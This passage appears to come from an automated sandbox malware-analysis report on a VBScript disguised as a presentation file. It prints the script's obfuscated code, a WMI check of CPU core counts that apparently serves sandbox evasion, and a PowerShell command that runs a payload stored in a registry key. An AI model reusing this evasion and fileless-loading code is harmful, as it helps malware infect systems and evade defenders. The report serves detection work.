            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3853321935-2125563209-4053062332-1002\Software\Microsoft\Office\16.0\Lync
            Source: my_presentation_96642.vbsStatic file information: File size 1185685 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.623592484.000001DE2A0D0000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.634178793.000001EE050C0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.658598905.0000000007640000.00000002.00000001.sdmp
            Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000003.668390079.000001C7AA4CC000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000003.668390079.000001C7AA4CC000.00000004.00000040.sdmp
            Source: Binary string: c:\25\Ready\death\Soil\Original\41\84\Play\49\Believe\settle\gun\shout\24\note.pdb source: Greenbelt.iso.0.dr
            Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.658598905.0000000007640000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.ScriptFullName)kieGl = iHLOpqas.ReadalliHLOpqas.close'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0))REM wildcatter something155 stratus briefcase Kikuyu prostitute chivalrous sextic Springfield embouchure bronze Hiawatha Hester airman weatherstripping quiver955 sob Kingsbury799 agreeable Chiang juncture Frankel custody imagine Clare garlic molecular gloss, 158521 Raul Walpole desolater ambulant jilt voluptuous, knoll lampoon Calkins194 somatic bonze megavolt tortoiseshell defector. Allan mock refrain wineskin onyx milt commutate spalding179 fanout urban bylaw fright lucrative355 competitor Venetian clattery Gaberones effaceable Russell221 typewrite Lagos Romania caching battalion taverna breast Blackburn peril pianissimo inquisitive roughshod gabbro758 hillmen digit roughen781. 3555716 interstitial 'MsgBox(ubound(Split (kieGl,vbCrlf))+(((261 - 255.0) + 228.0) - (234 - 1.0)))'MsgBox((((34 + (7395 - 250.0)) - 7174.0) + 1522.0) - ubound(Split (kieGl,vbCrlf))+((41 + (5 + 742.0)) - (66 + 721.0)))' wine tenement remediable middlemen gunsling Wichita prime lorry lead hurty, bivalve752 constant contiguous anthracnose pentagonal elevate Delphi abjure seam Baltic Costa Compagnie, substantiate either, 8158269 spout subject gobbledygook circumspect faze winch Westfield265, 7567782 bomb brow anarch Menorca contemporaneous wreak, 6643695 torrid echoes maudlin mangy ice plummet anchovy xylene313 Charta Leyden Mercedes ethnic995 mouthpart. 733637 Stearns book761 cook, forthcoming, flinty Johannes soapy Ballard334 Margery conclude retrofitting alias asylum451 exemplary Jude201 troff End FunctionFunction cohere844()on error resume nextIf (InStr(WScript.ScriptName, cStr(395578831)) > 0 And YMkye = 0) ThenExit FunctionEnd IfSet Missy965Service = GetObject("winmgmts:\\.\root\cimv2")Set XNhKYlItems = Missy965Service.ExecQuery("Select * from Win32_Processor", , (((79 + 10.0) + (0.0)) - (160 - 119.0)))For Each chaste In XNhKYlItemsIf chaste.NumberOfCores < ((61 + (-25.0)) + (-((154 - 76.0) + (-45.0)))) Thenscreech176 = TrueEnd IfREM contretemps sardonic crew pilfer criterion qs clairvoyant minnow Babylon516 pitfall Ryan153 whore chairwoman polyphony, Bushnell378 lineage calumny138 violent Daytona whiplash soma404 combustion differentiate Waring Eisenhower airman573 neednt812 flowchart radius300 Bridget, squirmy hop indent MacArthur penal489 Christ stylus prestige taxation peat shako591 drib axe. wigwam path349 carton sickle, honorific yipping, pitchblende418 harrow baroness brisk wane racemose piano sparrow arm63 absolute. clinch embower934, Kemp dig quizzing coachwork, 1152283 Whippany eight465 molasses horseplay381 scapular counterpoint dehydrate acclamation radices Next' archipelago accord landlady. diagrammed trellis additive oceanic correct. 9674830 TWA465, 4289949 ware oboe boatyard advisee, Pomona hydrogenate flan939 shish. alphabet homestead dogmatist niggle draft copperhead cryptanalysis swamp Elkhart accurate cherubim illimitable212. 437
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a11zr31h.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\x0s3qhtp.c